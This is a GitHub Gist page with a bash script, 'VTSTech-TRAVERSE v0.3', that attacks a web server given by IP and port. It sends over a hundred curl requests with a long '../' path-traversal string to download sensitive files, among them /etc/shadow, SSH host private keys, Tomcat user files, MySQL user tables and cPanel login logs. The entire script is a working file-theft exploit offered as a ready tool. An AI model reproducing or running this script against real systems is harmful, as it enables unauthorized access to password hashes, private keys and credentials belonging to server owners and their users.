Last active
October 14, 2024 14:31
-
-
Save VTSTech/1b39e434716daff200563f784d4f1dab to your computer and use it in GitHub Desktop.
VTSTech-TRAVERSE v0.3 - www.vts-tech.org
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "VTSTech-TRAVERSE v0.3 - www.vts-tech.org" | |
IP="$1" | |
PORT="$2" | |
OUTPUT_DIR=$(pwd) | |
TRAVERSE="../../../../../../../../../../../../../../../../../../../.." #modify as needed | |
PARAMS="/" #modify as needed | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/passwd -o ./etc/passwd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/shadow -o ./etc/shadow | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/aliases -o ./etc/aliases | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/anacrontab -o ./etc/anacrontab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/apache2/apache2.conf -o ./etc/apache2/apache2.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/apache2/httpd.conf -o ./etc/apache2/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/at.allow -o ./etc/at.allow | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/at.deny -o ./etc/at.deny | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/bashrc -o ./etc/bashrc | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/bootptab -o ./etc/bootptab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/chrootUsers -o ./etc/chrootUsers | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/chttp.conf -o ./etc/chttp.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/cron.allow -o ./etc/cron.allow | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/cron.deny -o ./etc/cron.deny | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/crontab -o ./etc/crontab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/cups/cupsd.conf -o ./etc/cups/cupsd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/exports -o ./etc/exports | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/fstab -o ./etc/fstab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ftpaccess -o ./etc/ftpaccess | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ftpchroot -o ./etc/ftpchroot | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ftphosts -o ./etc/ftphosts | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/groups -o ./etc/groups | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/grub.conf -o ./etc/grub.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/hosts -o ./etc/hosts | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/hosts.allow -o ./etc/hosts.allow | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/hosts.deny -o ./etc/hosts.deny | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/access.conf -o ./etc/httpd/access.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/conf/httpd.conf -o ./etc/httpd/conf/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/httpd.conf -o ./etc/httpd/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/logs/access_log -o ./etc/httpd/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/logs/access.log -o ./etc/httpd/logs/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/logs/error_log -o ./etc/httpd/logs/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/logs/error.log -o ./etc/httpd/logs/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/php.ini -o ./etc/httpd/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/httpd/srm.conf -o ./etc/httpd/srm.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/inetd.conf -o ./etc/inetd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/inittab -o ./etc/inittab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/issue -o ./etc/issue | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/lighttpd.conf -o ./etc/lighttpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/lilo.conf -o ./etc/lilo.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/logrotate.d/ftp -o ./etc/logrotate.d/ftp | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/logrotate.d/proftpd -o ./etc/logrotate.d/proftpd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/logrotate.d/vsftpd.log -o ./etc/logrotate.d/vsftpd.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/lsb-release -o ./etc/lsb-release | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/motd -o ./etc/motd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/modules.conf -o ./etc/modules.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/motd -o ./etc/motd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/mtab -o ./etc/mtab | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/my.cnf -o ./etc/my.cnf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/my.conf -o ./etc/my.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/mysql/my.cnf -o ./etc/mysql/my.cnf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/network/interfaces -o ./etc/network/interfaces | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/networks -o ./etc/networks | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/npasswd -o ./etc/npasswd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/passwd -o ./etc/passwd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php4.4/fcgi/php.ini -o ./etc/php4.4/fcgi/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php4/apache2/php.ini -o ./etc/php4/apache2/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php4/apache/php.ini -o ./etc/php4/apache/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php4/cgi/php.ini -o ./etc/php4/cgi/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php4/apache2/php.ini -o ./etc/php4/apache2/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php5/apache2/php.ini -o ./etc/php5/apache2/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php5/apache/php.ini -o ./etc/php5/apache/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php/apache2/php.ini -o ./etc/php/apache2/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php/apache/php.ini -o ./etc/php/apache/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php/cgi/php.ini -o ./etc/php/cgi/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php.ini -o ./etc/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php/php4/php.ini -o ./etc/php/php4/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/php/php.ini -o ./etc/php/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/printcap -o ./etc/printcap | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/profile -o ./etc/profile | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/proftp.conf -o ./etc/proftp.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/proftpd/proftpd.conf -o ./etc/proftpd/proftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pure-ftpd.conf -o ./etc/pure-ftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pureftpd.passwd -o ./etc/pureftpd.passwd | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pureftpd.pdb -o ./etc/pureftpd.pdb | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pure-ftpd/pure-ftpd.conf -o ./etc/pure-ftpd/pure-ftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pure-ftpd/pure-ftpd.pdb -o ./etc/pure-ftpd/pure-ftpd.pdb | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/pure-ftpd/putreftpd.pdb -o ./etc/pure-ftpd/putreftpd.pdb | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/redhat-release -o ./etc/redhat-release | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/resolv.conf -o ./etc/resolv.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/samba/smb.conf -o ./etc/samba/smb.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/snmpd.conf -o ./etc/snmpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/ssh_config -o ./etc/ssh/ssh_config | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/sshd_config -o ./etc/ssh/sshd_config | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/ssh_host_dsa_key -o ./etc/ssh/ssh_host_dsa_key | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/ssh_host_dsa_key.pub -o ./etc/ssh/ssh_host_dsa_key.pub | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/ssh_host_key -o ./etc/ssh/ssh_host_key | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/ssh/ssh_host_key.pub -o ./etc/ssh/ssh_host_key.pub | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/sysconfig/network -o ./etc/sysconfig/network | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/syslog.conf -o ./etc/syslog.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/termcap -o ./etc/termcap | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/vhcs2/proftpd/proftpd.conf -o ./etc/vhcs2/proftpd/proftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/vsftpd.chroot_list -o ./etc/vsftpd.chroot_list | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/vsftpd.conf -o ./etc/vsftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/vsftpd/vsftpd.conf -o ./etc/vsftpd/vsftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/wu-ftpd/ftpaccess -o ./etc/wu-ftpd/ftpaccess | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/wu-ftpd/ftphosts -o ./etc/wu-ftpd/ftphosts | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/etc/wu-ftpd/ftpusers -o ./etc/wu-ftpd/ftpusers | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/logs/pure-ftpd.log -o ./logs/pure-ftpd.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/logs/security_debug_log -o ./logs/security_debug_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/logs/security_log -o ./logs/security_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/lampp/etc/httpd.conf -o ./opt/lampp/etc/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/xampp/etc/php.ini -o ./opt/xampp/etc/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/tomcat/conf/server.xml -o ./opt/tomcat/conf/server.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/tomcat/conf/tomcat-users.xml -o ./opt/tomcat/conf/tomcat-users.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/tomcat8/conf/server.xml -o ./opt/tomcat8/conf/server.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/opt/tomcat8/conf/tomcat-users.xml -o ./opt/tomcat8/conf/tomcat-users.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/cpuinfo -o ./proc/cpuinfo | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/filesystems -o ./proc/filesystems | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/interrupts -o ./proc/interrupts | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/ioports -o ./proc/ioports | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/meminfo -o ./proc/meminfo | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/modules -o ./proc/modules | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/mounts -o ./proc/mounts | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/stat -o ./proc/stat | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/swaps -o ./proc/swaps | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/version -o ./proc/version | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/proc/self/net/arp -o ./proc/self/net/arp | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/root/anaconda-ks.cfg -o ./root/anaconda-ks.cfg | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/etc/pure-ftpd.conf -o ./usr/etc/pure-ftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/lib/php.ini -o ./usr/lib/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/lib/php/php.ini -o ./usr/lib/php/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/conf/modsec.conf -o ./usr/local/apache/conf/modsec.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/conf/php.ini -o ./usr/local/apache/conf/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/log -o ./usr/local/apache/log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/logs -o ./usr/local/apache/logs | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/logs/access_log -o ./usr/local/apache/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/logs/access.log -o ./usr/local/apache/logs/access.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/audit_log -o ./usr/local/apache/audit_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/error_log -o ./usr/local/apache/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/apache/error.log -o ./usr/local/apache/error.log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs -o ./usr/local/cpanel/logs | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs/access_log -o ./usr/local/cpanel/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs/error_log -o ./usr/local/cpanel/logs/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs/license_log -o ./usr/local/cpanel/logs/license_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs/login_log -o ./usr/local/cpanel/logs/login_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/cpanel/logs/stats_log -o ./usr/local/cpanel/logs/stats_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/etc/httpd/logs/access_log -o ./usr/local/etc/httpd/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/etc/httpd/logs/error_log -o ./usr/local/etc/httpd/logs/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/etc/php.ini -o ./usr/local/etc/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/etc/pure-ftpd.conf -o ./usr/local/etc/pure-ftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/etc/pureftpd.pdb -o ./usr/local/etc/pureftpd.pdb | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/lib/php.ini -o ./usr/local/lib/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php4/httpd.conf -o ./usr/local/php4/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php4/httpd.conf.php -o ./usr/local/php4/httpd.conf.php | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php4/lib/php.ini -o ./usr/local/php4/lib/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php5/httpd.conf -o ./usr/local/php5/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php5/httpd.conf.php -o ./usr/local/php5/httpd.conf.php | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php5/lib/php.ini -o ./usr/local/php5/lib/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php/httpd.conf -o ./usr/local/php/httpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php/httpd.conf.ini -o ./usr/local/php/httpd.conf.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/php/lib/php.ini -o ./usr/local/php/lib/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/pureftpd/etc/pure-ftpd.conf -o ./usr/local/pureftpd/etc/pure-ftpd.conf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/pureftpd/etc/pureftpd.pdn -o ./usr/local/pureftpd/etc/pureftpd.pdn | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/pureftpd/sbin/pure-config.pl -o ./usr/local/pureftpd/sbin/pure-config.pl | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/share/tomcat/conf/server.xml -o ./usr/share/tomcat/conf/server.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/share/tomcat/conf/tomcat-users.xml -o ./usr/share/tomcat/conf/tomcat-users.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/share/tomcat8/conf/server.xml -o ./usr/share/tomcat8/conf/server.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/share/tomcat8/conf/tomcat-users.xml -o ./usr/share/tomcat8/conf/tomcat-users.xml | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/www/logs/httpd_log -o ./usr/local/www/logs/httpd_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/local/Zend/etc/php.ini -o ./usr/local/Zend/etc/php.ini | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/usr/sbin/pure-config.pl -o ./usr/sbin/pure-config.pl | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/adm/log/xferlog -o ./var/adm/log/xferlog | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/apache2/config.inc -o ./var/apache2/config.inc | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/apache/logs/access_log -o ./var/apache/logs/access_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/apache/logs/error_log -o ./var/apache/logs/error_log | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/cpanel/cpanel.config -o ./var/cpanel/cpanel.config | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/lib/mysql/my.cnf -o ./var/lib/mysql/my.cnf | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/lib/mysql/mysql/user.MYD -o ./var/lib/mysql/mysql/user.MYD | |
curl --output-dir $OUTPUT_DIR --create-dirs --path-as-is http://$IP:$PORT$PARAMS$TRAVERSE/var/local/www/conf/php.ini -o ./var/local/www/conf/php.ini | |
